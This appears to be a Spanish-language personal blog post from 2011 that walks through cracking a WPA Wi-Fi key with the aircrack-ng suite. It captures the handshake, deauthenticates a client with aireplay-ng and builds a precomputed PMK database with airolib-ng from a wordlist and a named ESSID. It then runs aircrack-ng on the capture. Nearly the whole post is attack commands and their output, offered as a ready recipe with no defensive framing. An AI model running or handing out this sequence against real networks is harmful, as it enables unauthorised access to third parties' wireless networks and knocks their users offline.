Páginas

lunes, 17 de enero de 2011

Wpa y airolib-ng

Claves Wpa y airolib-ng
Avanzado

Capturar el Handshake AP y canal especifico:
hypatia gentoo # airodump-ng --bssid macap -c 1 -w output mon0

Desautenticar
hypatia gentoo # aireplay-ng --deauth 10 -a macap -c maclient mon0

Aparece el nombre del essid oculto
Tendo el Handshake

wpa Handshake: xx:xx:xx:xx:xx:xx

hypatia cowpatty-4.3 # airolib-ng /media/wpa_tables/wpa_psk-h1kari_renderman/crackwpa --import passwd /media/wpa_tables/wpa_psk-h1kari_renderman/word.lst /media/wpa_tables/wpa_psk-h1kari_renderman/database
Database does not already exist, creating it...
Database sucessfully created
Reading file...
Writing...lines read, 190867551 invalid lines ignored.
Done.

Un archivo de texto llamado essid con el nombre del ssid:
hypatia cowpatty-4.3 # airolib-ng /media/wpa_tables/wpa_psk-h1kari_renderman/crackwpa --import essid ./essid
Reading file...
Writing...
Done.

hypatia cowpatty-4.3 # airolib-ng /media/wpa_tables/wpa_psk-h1kari_renderman/crackwpa --stats
There are 1 ESSIDs and 4047221 passwords in the database. 0 out of 4047221 possible combinations have been computed (0%).

ESSID    Priority    Done
JAZZTEL_568B    64    0.0

hypatia cowpatty-4.3 # airolib-ng /media/wpa_tables/wpa_psk-h1kari_renderman/crackwpa --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok

Done.

hypatia cowpatty-4.3 # airolib-ng /media/wpa_tables/wpa_psk-h1kari_renderman/crackwpa --batch
Computed 25000 PMK in 126 seconds (198 PMK/s, 225000 in buffer).
Computed 50000 PMK in 248 seconds (201 PMK/s, 200000 in buffer).
Computed 75000 PMK in 370 seconds (202 PMK/s, 175000 in buffer).
Computed 100000 PMK in 492 seconds (203 PMK/s, 150000 in buffer)
Computed 4047221 PMK in 20216 seconds (200 PMK/s, 0 in buffer).
All ESSID processed.

hypatia cowpatty-4.3 # airolib-ng /media/wpa_tables/wpa_psk-h1kari_renderman/crackwpa --verify all
Checking all PMKs. This could take a while...
ESSID    PASSWORD    PMK_DB    CORRECT

hypatia cowpatty-4.3 # aircrack-ng -r /media/wpa_tables/wpa_psk-h1kari_renderman/crackwpa output-01.cap

current passhare: .....

key fount [..........]

Linux es genial!.